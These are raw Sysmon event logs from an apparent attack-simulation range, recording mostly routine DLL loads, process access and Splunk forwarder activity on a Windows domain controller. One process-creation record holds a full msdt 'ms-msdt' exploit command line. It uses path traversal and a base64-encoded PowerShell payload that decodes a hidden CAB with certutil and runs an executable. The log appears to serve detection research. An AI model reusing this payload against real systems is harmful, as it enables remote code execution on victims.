CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704,IMPHASH=1835EBC72F9ADB09C6FCFABC04AC9C89trueMicrosoft WindowsValid 734700x8000000000000000100377Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.919{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\shell32.dll10.0.14393.5125 (rs1_release.220429-1732)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F6FECBE8E5C78CD1621E3FF94040AC88,SHA256=128677FA3B8E693EB1C71D455A574CAFB3A0BB688FA1F813F17E476098C59C77,IMPHASH=0DFD49B61B099EE341A0B3D9B49EE90DtrueMicrosoft WindowsValid 734700x8000000000000000100376Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.919{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x8000000000000000100375Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.919{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x8000000000000000100374Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.919{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000100373Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.919{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x8000000000000000100372Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.919{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x8000000000000000100371Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.919{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x8000000000000000100370Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.903{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x8000000000000000100369Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.903{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 734700x8000000000000000100368Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.903{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x8000000000000000100367Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.903{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x8000000000000000100366Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.903{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 10341000x8000000000000000100365Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.903{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000100364Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.903{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\msdt.exe10.0.14393.0 (rs1_release.160715-1616)Diagnostics Troubleshooting WizardMicrosoft® Windows® Operating SystemMicrosoft Corporationmsdt.exeMD5=BB98CE2BD520AC69CB3D2F830974CABE,SHA256=C1237BDD2B574C1CBBB4A0D990773BBED5B6FE3BD14F8011C0E79F9CDDCA2B4E,IMPHASH=5D314604CE5F7FF83060B18832AA0D35trueMicrosoft WindowsValid 10341000x8000000000000000100363Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.903{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100362Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.903{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100361Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.903{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100360Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.903{326FD73D-A43E-6294-D800-000000005502}28843792C:\Windows\system32\csrss.exe{326FD73D-C13D-6294-460B-000000005502}6584C:\WINDOWS\system32\msdt.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000100359Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.903{326FD73D-AAC7-6294-6108-000000005502}54885948C:\Windows\system32\cmd.exe{326FD73D-C13D-6294-460B-000000005502}6584C:\WINDOWS\system32\msdt.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+1ace3|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000100358Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.911{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exe10.0.14393.0 (rs1_release.160715-1616)Diagnostics Troubleshooting WizardMicrosoft® Windows® Operating SystemMicrosoft Corporationmsdt.exe"C:\WINDOWS\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=calc IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNtZC5leGUiO1N0YXJ0LVByb2Nlc3MgJGNtZCAtd2luZG93c3R5bGUgaGlkZGVuIC1Bcmd1bWVudExpc3QgIi9jIHRhc2traWxsIC9mIC9pbSBtc2R0LmV4ZSI7U3RhcnQtUHJvY2VzcyAkY21kIC13aW5kb3dzdHlsZSBoaWRkZW4gLUFyZ3VtZW50TGlzdCAiL2MgY2QgQzpcdXNlcnNccHVibGljXCYmZm9yIC9yICV0ZW1wJSAlaSBpbiAoMDUtMjAyMi0wNDM4LnJhcikgZG8gY29weSAlaSAxLnJhciAveSYmZmluZHN0ciBUVk5EUmdBQUFBIDEucmFyPjEudCYmY2VydHV0aWwgLWRlY29kZSAxLnQgMS5jICYmZXhwYW5kIDEuYyAtRjoqIC4mJnJnYi5leGUiOw=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO"C:\Program Files\ansible\sysmon\ATTACKRANGE\Administrator{326FD73D-A440-6294-2753-0E0000000000}0xe53272HighMD5=BB98CE2BD520AC69CB3D2F830974CABE,SHA256=C1237BDD2B574C1CBBB4A0D990773BBED5B6FE3BD14F8011C0E79F9CDDCA2B4E,IMPHASH=5D314604CE5F7FF83060B18832AA0D35{326FD73D-AAC7-6294-6108-000000005502}5488C:\Windows\System32\cmd.exe"cmd.exe" /s /k pushd "C:\Program Files\ansible\sysmon" 23542300x8000000000000000100357Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.388{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86D5AEEB56CBBC28008DAD33F1B5B4BD,SHA256=CC7D23BDB7C174A127C43CD8377852365A7802F0A9DAC3C4E2F29D15577F797A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100432Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:06.513{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE4A30A82BE721733C48307232E7BF72,SHA256=3CDD0F925E801DE63D3DD02CE0CA135C4DF812E3E47480C48C239889A8C92DBD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100431Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:06.138{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=682A635C7A60B72DD6012EF6D316E261,SHA256=E2CCAB4279BF974454E37335231FA565EE9F06992079E47F5C152C4D0CA49527,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100435Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:07.607{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D3E9815AA74AEC835C001F39159D84F,SHA256=ACA667C8CD98853B1A5AB1F85CED54BDFEEA81424E8FB3FE706B0F9AD66E6312,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100434Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:07.028{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=52A969F99A03D24CA6B7C1A26004FA04,SHA256=D4BC2F8148AC761A24822DC5126188BEB984EBE5FA96D87C704655172947D127,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100433Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:02.988{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53353-false10.0.1.12-8000- 23542300x8000000000000000100445Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:08.700{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3059315A02E3840301204140135C286,SHA256=7071695C8DB611777A2F9FB72FB5743622CC5B23A74173A18D9BDA1F7DD5E4A3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x8000000000000000100444Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:08.294{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\msxml6.dll6.30.14393.5006MSXML 6.0Microsoft XML Core ServicesMicrosoft CorporationMSXML6.dllMD5=713974F49A72B2239989F2C671747CC0,SHA256=52333BF669EBBFFD2E3169AC2F718D4A106A87D73DE74C07E7E824651FDDAFA7,IMPHASH=FCAD6732873DA041FB25E83E799A2652trueMicrosoft WindowsValid 734700x8000000000000000100443Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:08.294{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A82FB68F785E73141F5ABC91850595A8,SHA256=416DE0DA209CDCBE9B5D1A868CE972F8FE3399FF62E84EFD46D6FD49BDF7B7B2,IMPHASH=0BE8D1F061DD646F6D2B834CB7C9C900trueMicrosoft WindowsValid 10341000x8000000000000000100442Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:08.294{326FD73D-A441-6294-EB00-000000005502}48007160C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6108-000000005502}5488C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9b5f|C:\Windows\System32\SHELL32.dll+eb6a5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100441Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:08.294{326FD73D-A441-6294-EB00-000000005502}48007160C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6108-000000005502}5488C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+eb5be|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100440Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:08.294{326FD73D-A441-6294-EB00-000000005502}48007160C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6108-000000005502}5488C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9db4|C:\Windows\System32\SHELL32.dll+eb587|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100439Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:08.294{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6208-000000005502}5940C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9b5f|C:\Windows\System32\SHELL32.dll+ebd30|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100438Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:08.294{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6208-000000005502}5940C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+81330|C:\Windows\System32\SHELL32.dll+ebcec|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100437Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:08.294{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6208-000000005502}5940C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9db4|C:\Windows\System32\SHELL32.dll+ebcc0|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100436Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:08.294{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6208-000000005502}5940C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+ffe59|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000100446Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:09.794{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FEEFE5D46D93EF9A6C04E7AF63A885A,SHA256=68EDE7FCDA87C83A18B855AE52CD716673A6C13A576E8642303404F2A11EE2DB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100447Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:10.888{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65F94AB00F9FB93B02C7CC39E3A815C0,SHA256=F8738B6813E026A9571D00AB00EA8552CD5A096D4B699345262BDD13B4D1D75D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100449Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:11.982{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 